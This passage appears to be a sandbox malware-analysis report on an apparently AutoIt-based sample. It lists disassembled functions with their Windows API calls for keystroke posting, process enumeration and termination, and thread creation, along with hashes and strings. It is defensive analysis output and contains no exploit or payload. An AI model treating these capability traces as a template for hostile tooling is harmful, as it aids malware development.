                                        • API String ID: 337547030-0
                                        • Opcode ID: 12955ee60cd54a10aeeca93e6787ff71592a3edaf38f4eb65b25339bc6d59c1e
                                        • Instruction ID: 96c2ff3288524e5177ddaea858befcc54399262d047aa0323054173f9f9c043b
                                        • Opcode Fuzzy Hash: 12955ee60cd54a10aeeca93e6787ff71592a3edaf38f4eb65b25339bc6d59c1e
                                        • Instruction Fuzzy Hash: 09317AB1600605AFDB229FA1DD49A76BBF9FF09300B14841DFC9B82610D739E8149BA0
                                        Function 00752E32 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007542CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 007542E6
                                          • Part of subcall function 007542CC: GetCurrentThreadId.KERNEL32 ref: 007542ED
                                          • Part of subcall function 007542CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00752E43), ref: 007542F4
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00752E4D
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00752E6B
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00752E6F
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00752E79
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00752E91
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00752E95
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00752E9F
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00752EB3
                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00752EB7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: c3a1d7fb0ca8b145d83e6b82962e0f561153709071c5c3bea81dee0403606e8b
                                        • Instruction ID: ef3568292fa15b9e89eb9013f082dbc246a004ad22b7da02e2af8e8f74ebe56b
                                        • Opcode Fuzzy Hash: c3a1d7fb0ca8b145d83e6b82962e0f561153709071c5c3bea81dee0403606e8b
                                        • Instruction Fuzzy Hash: B401D8317C0214BBFB2067699C8EF563F5AEF49B52F214001F718AE1E1C9E51844CA6D
                                        Function 00752093 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00751CD9,?,?,00000000), ref: 0075209C
                                        • HeapAlloc.KERNEL32(00000000,?,00751CD9,?,?,00000000), ref: 007520A3
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00751CD9,?,?,00000000), ref: 007520B8
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00751CD9,?,?,00000000), ref: 007520C0
                                        • DuplicateHandle.KERNEL32(00000000,?,00751CD9,?,?,00000000), ref: 007520C3
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00751CD9,?,?,00000000), ref: 007520D3
                                        • GetCurrentProcess.KERNEL32(00751CD9,00000000,?,00751CD9,?,?,00000000), ref: 007520DB
                                        • DuplicateHandle.KERNEL32(00000000,?,00751CD9,?,?,00000000), ref: 007520DE
                                        • CreateThread.KERNEL32(00000000,00000000,00752104,00000000,00000000,00000000), ref: 007520F8
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                        • String ID:
                                        • API String ID: 1957940570-0
                                        • Opcode ID: 0da3c7ee1de513374f07a9f6ec0bb3304068492c752f4dbb2a380f0bb4ee1677
                                        • Instruction ID: 5d072b7509e98c078498761e9570ceb10b7560d605b909cc083b0267b83f6b06
                                        • Opcode Fuzzy Hash: 0da3c7ee1de513374f07a9f6ec0bb3304068492c752f4dbb2a380f0bb4ee1677
                                        • Instruction Fuzzy Hash: 9A01BFB5680308BFE720ABA5DC8DF573B6CEB89711F118411FA05DB1E1C6749C00CB24
                                        Function 0077AA41 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0075DC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 0075DCC1
                                          • Part of subcall function 0075DC9C: Process32FirstW.KERNEL32(00000000,?), ref: 0075DCCF
                                          • Part of subcall function 0075DC9C: CloseHandle.KERNELBASE(00000000), ref: 0075DD9C
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0077AACC
                                        • GetLastError.KERNEL32 ref: 0077AADF
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0077AB12
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0077ABC7
                                        • GetLastError.KERNEL32(00000000), ref: 0077ABD2
                                        • CloseHandle.KERNEL32(00000000), ref: 0077AC23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: 82fcf306c5c9667e0ecbe1dea4cfef9b20ea6b3f571ec6ced376a024330bea55
                                        • Instruction ID: efc0e7d3ac758d9d47e5ea566426ae36286d91f6f1a60f323e46703ba547f21d
                                        • Opcode Fuzzy Hash: 82fcf306c5c9667e0ecbe1dea4cfef9b20ea6b3f571ec6ced376a024330bea55
                                        • Instruction Fuzzy Hash: AA618470204201AFE720DF18C494F29BBE6AF54358F15C49CE5698B7A3C779ED45CB92
                                        Function 007841E5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00784284
                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00784299
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007842B3
                                        • _wcslen.LIBCMT ref: 007842F8
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00784325
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00784353
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcslen
                                        • String ID: SysListView32
                                        • API String ID: 2147712094-78025650
                                        • Opcode ID: 9f5357e65b65e1eca8366df390ec8e252b120380a2e8865cfef99523690fc3cf
                                        • Instruction ID: fdc68e8fc8c6df3a5a489a0951e0a653785961a1f6abdb78515e8568e40873b2
                                        • Opcode Fuzzy Hash: 9f5357e65b65e1eca8366df390ec8e252b120380a2e8865cfef99523690fc3cf
                                        • Instruction Fuzzy Hash: 5C419271940319EBEB21AF64CC49FEA7BA9FF08360F10052AF954E7191D7B99D90CB90
                                        Function 0075C53A Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0075C5D9
                                        • IsMenu.USER32(00000000), ref: 0075C5F9
                                        • CreatePopupMenu.USER32 ref: 0075C62F
                                        • GetMenuItemCount.USER32(00D75C98), ref: 0075C680
                                        • InsertMenuItemW.USER32(00D75C98,?,00000001,00000030), ref: 0075C6A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                        • String ID: 0$2
                                        • API String ID: 93392585-3793063076
                                        • Opcode ID: 0fc2dd105f8dbfab0375f67b17109e738f72ed9c7c7f58d0e46dbe5b830fbe7e
                                        • Instruction ID: f279461c2505f0daa6edc2fc60aafc7a32ed0ad86bae14b3eccb3178222e4545
                                        • Opcode Fuzzy Hash: 0fc2dd105f8dbfab0375f67b17109e738f72ed9c7c7f58d0e46dbe5b830fbe7e
                                        • Instruction Fuzzy Hash: 0F51C070A00305EFDB22CF68C988BEEBBF4EF44315F245159EC1197291E7B89A48CB25
                                        Function 0075E653 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                        • String ID: 0.0.0.0
                                        • API String ID: 642191829-3771769585
                                        • Opcode ID: 5bf56f9682297ba5dea69481aaef62c39bcf0abbb71b1e45e31b965f45e90a4c
                                        • Instruction ID: c7bddf7402e1ef06ec0577b4cb85dd5efa7a9576b6bfe0d2328fbd1e64424045
                                        • Opcode Fuzzy Hash: 5bf56f9682297ba5dea69481aaef62c39bcf0abbb71b1e45e31b965f45e90a4c
                                        • Instruction Fuzzy Hash: 1511DF71900215ABEB38AB349C4EEEE77BCDF44721F100065F945920D1EFBC8E859BA4
                                        Function 007742A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 007742C8
                                        • CharUpperBuffW.USER32(?,?), ref: 007743D7
                                        • _wcslen.LIBCMT ref: 007743E7
                                        • VariantClear.OLEAUT32(?), ref: 0077457C
                                          • Part of subcall function 007615B3: VariantInit.OLEAUT32(00000000), ref: 007615F3
                                          • Part of subcall function 007615B3: VariantCopy.OLEAUT32(?,?), ref: 007615FC
                                          • Part of subcall function 007615B3: VariantClear.OLEAUT32(?), ref: 00761608
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4137639002-1221869570
                                        • Opcode ID: 430a540eda5eb9adf5ed271e613d230935009808259a944d2654420c7ff55b57
                                        • Instruction ID: e191e2bcddfe7e251300c9cbf8cee8997c1b2d9abed58c7690a9e00087019166
                                        • Opcode Fuzzy Hash: 430a540eda5eb9adf5ed271e613d230935009808259a944d2654420c7ff55b57
                                        • Instruction Fuzzy Hash: 299156756083459FCB00EF28C48496AB7E5FF88354F14892DF89A9B351DB38ED46CB92
                                        Function 00782A5C Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenu.USER32(?), ref: 00782AE2
                                        • GetMenuItemCount.USER32(00000000), ref: 00782B14
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00782B3C
                                        • _wcslen.LIBCMT ref: 00782B72
                                        • GetMenuItemID.USER32(?,?), ref: 00782BAC
                                        • GetSubMenu.USER32(?,?), ref: 00782BBA
                                          • Part of subcall function 007542CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 007542E6
                                          • Part of subcall function 007542CC: GetCurrentThreadId.KERNEL32 ref: 007542ED
                                          • Part of subcall function 007542CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00752E43), ref: 007542F4
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00782C42
                                          • Part of subcall function 0075F1A7: Sleep.KERNEL32 ref: 0075F21F
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                        • String ID:
                                        • API String ID: 4196846111-0
                                        • Opcode ID: 0db25c02f5fe28b906980d13def44ec9e52ffb9cbebda47800ef827608905587
                                        • Instruction ID: 07861b27a0bdf8b6c69b906be31f951861cbd0b9c787f7bb3e9096ee510627d7
                                        • Opcode Fuzzy Hash: 0db25c02f5fe28b906980d13def44ec9e52ffb9cbebda47800ef827608905587
                                        • Instruction Fuzzy Hash: E6718375A40205EFCB14EF68C845AAE7BF1FF48311F108459E916EB352DB78ED428B90
                                        Function 007887FD Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 00788896
                                        • IsWindowEnabled.USER32(00000000), ref: 007888A2
                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0078897D
                                        • SendMessageW.USER32(00000000,000000B0,?,?), ref: 007889B0
                                        • IsDlgButtonChecked.USER32(?,00000000), ref: 007889E8
                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00788A0A
                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00788A22
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                        • String ID:
                                        • API String ID: 4072528602-0
                                        • Opcode ID: 21b62e95bb6414687917865d4ca5b8be73a69796106fb91ee45649a61dd8658d
                                        • Instruction ID: 0097508d4ea27214ebe418e9f7277eb9b2f21b21542369a1657a4dff39ee94cb
                                        • Opcode Fuzzy Hash: 21b62e95bb6414687917865d4ca5b8be73a69796106fb91ee45649a61dd8658d
                                        • Instruction Fuzzy Hash: 8671EF34680205EFEF65EF54C884FBA7BB9EF09300F944459E845932A2CB39AD51CB12
                                        Function 0075808C Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007580D1
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007580F7
                                        • SysAllocString.OLEAUT32(00000000), ref: 007580FA
                                        • SysAllocString.OLEAUT32 ref: 0075811B
                                        • SysFreeString.OLEAUT32 ref: 00758124
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0075813E
                                        • SysAllocString.OLEAUT32(?), ref: 0075814C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 61f49019e3700c68ce41c6d567c289cfce78df6fa40a62f97f0e28a666ab1483
                                        • Instruction ID: e3aab28378c5c5c6bf020859bae23d593161ca33fb1a4f130b8053c24bb9820e
                                        • Opcode Fuzzy Hash: 61f49019e3700c68ce41c6d567c289cfce78df6fa40a62f97f0e28a666ab1483
                                        • Instruction Fuzzy Hash: 89217771600208AFDB509FACDC88DEA77ECEB493617148125FD15DB2E0DAB8DC49CB65
                                        Function 00760D8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(0000000C), ref: 00760DAE
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00760DEA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: a3a93831b74790c88bf2d1b208ae84aee1e973b5e1919413b615dcbc8d90a2c1
                                        • Instruction ID: f4c101c63de44d4196fc774bf70292689e8a514d7a1e038fe5221e1f24f68ceb
                                        • Opcode Fuzzy Hash: a3a93831b74790c88bf2d1b208ae84aee1e973b5e1919413b615dcbc8d90a2c1
                                        • Instruction Fuzzy Hash: CA214D74500315AFDB209F69D804A9BBBA4FF55720F204E19EDA2D72D0D7769C50CB90
                                        Function 00760E63 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 00760E82
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00760EBD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CreateHandlePipe
                                        • String ID: nul
                                        • API String ID: 1424370930-2873401336
                                        • Opcode ID: 03f00621b288fd5c86bd1cd8e34e4e97f476670071a333892c3857f780d9a23a
                                        • Instruction ID: fffab58628618d5b162474d894eb0c2543126e543b739515e93ac9b3d485ac8e
                                        • Opcode Fuzzy Hash: 03f00621b288fd5c86bd1cd8e34e4e97f476670071a333892c3857f780d9a23a
                                        • Instruction Fuzzy Hash: 2E214C71504316ABDB309FB89C08A9BB7A8EF55724F204A19FDA2E32D0D7799840CB90
                                        Function 00784A0C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006F7759
                                          • Part of subcall function 006F771B: GetStockObject.GDI32(00000011), ref: 006F776D
                                          • Part of subcall function 006F771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 006F7777
                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00784A71
                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00784A7E
                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00784A89
                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00784A98
                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00784AA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: MessageSend$CreateObjectStockWindow
                                        • String ID: Msctls_Progress32
                                        • API String ID: 1025951953-3636473452
                                        • Opcode ID: 2dfdbe4749a098203f8125908b41b7c089e6e0f7f11991b929a98b48a923cc81
                                        • Instruction ID: 33bb886f79b0c780808f59a226b693035d17425b2dd3f1e5c2b6f5504af8e5fd
                                        • Opcode Fuzzy Hash: 2dfdbe4749a098203f8125908b41b7c089e6e0f7f11991b929a98b48a923cc81
                                        • Instruction Fuzzy Hash: D31186B119011EBEEF119F64CC85EE77F9DEF08758F118111BB14A6090C6759C21DBA4
                                        Function 0075E223 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0075E23D
                                        • LoadStringW.USER32(00000000), ref: 0075E244
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0075E25A
                                        • LoadStringW.USER32(00000000), ref: 0075E261
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0075E2A5
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 0075E282
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 4072794657-3128320259
                                        • Opcode ID: d599489b1973316da576ef68234a755fd4c353c4d8fba775edf3364e1073b5bd
                                        • Instruction ID: 93efb85b5fd770f98ba9563ba987437ae56c76b3bddc7dd531bf789a8836ca3d
